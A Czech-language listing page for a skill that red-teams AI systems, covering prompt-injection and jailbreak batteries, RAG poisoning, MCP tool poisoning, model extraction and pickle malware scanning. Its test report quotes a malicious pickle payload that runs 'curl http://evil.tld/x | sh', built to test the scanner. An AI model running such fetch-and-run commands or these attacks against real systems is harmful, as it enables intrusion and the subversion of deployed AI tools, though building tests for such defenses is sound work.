AI Security
Ofenzivní testování systémů LLM/ML: prompt injection, RAG poisoning, skenování pickle-modelů
Otestováno · Funguje
Co umí
Dovednost pro ofenzivní bezpečnost pro red-teaming systémů AI/ML: prompt-injection a multi-turn jailbreak baterie, RAG/vector-DB poisoning, audity MCP/agent tool-poisoning, skenování malware v pickle-modelech před načtením a black-box extrakce modelu/sondy pro inferenci členství, s mapováním na OWASP LLM Top-10 a MITRE ATLAS. Spouští se, když uživatel požádá o útok, red-teaming nebo audit LLM, chatbota, RAG pipeline, MCP serveru nebo staženého artefaktu modelu. Dodává pět spustitelných Python skriptů plus pět referenčních hloubkových analýz vázaných na konkrétní CVE z let 2024-2025.
Testovací report
Načten skills/ai-security/SKILL.md a namátkově zkontrolovány 3 přibalené soubory (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) — všechny HTTP 200. Pro VÝSTUP jsem spustil skripty dovednosti pouze ze stdlib scripts/model_scan.py proti pickle souborům, které jsem vytvořil: jeden škodlivý s __reduce__ -> os.system("curl http://evil.tld/x | sh"), jeden benigní a jeden benigní, jehož data obsahovala pouze řetězce "operating_system"/"subprocess". Základní linie (naivní byte-grep) označila škodlivý soubor, ale také FALSE-POSITIVED benigní soubor se seznamem štítků. Dovednost rozebrala pickle opcodes pomocí pickletools, vyřešila posix.system přes REDUCE-reachability jako zakázanou volatelnost (strukturovaný JSONL: severity high, CWE-502, AML.T0011, exit code 2 jako CI brána) a správně vyčistila oba benigní soubory. Ověřena instalace do čistého mktemp HOME umístěním SKILL.md do ~/.claude/skills/ai-security/SKILL.md.
Testováno: 2026-07-31 · Claude Code 2.x (agent harness)
Instalace
git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src mkdir -p ~/.claude/skills cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security # Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/). # Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers; # promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint. # Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone): # /plugin marketplace add hypnguyen1209/offensive-claude # /plugin install offensive-claude@offensive-claude-marketplace # NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.
Příkazy a ukázkové prompty
/ai-securityOfenzivní testování systémů LLM/ML: prompt injection, RAG poisoning, skenování pickle-modelů
Skilly se spouštějí běžnými požadavky — žádné příkazy k zapamatování. Po instalaci ho aktivují prompty jako tyto (anglicky):
Test this model against known jailbreak techniquesCheck this RAG pipeline for vector poisoningRun a model extraction attack against this API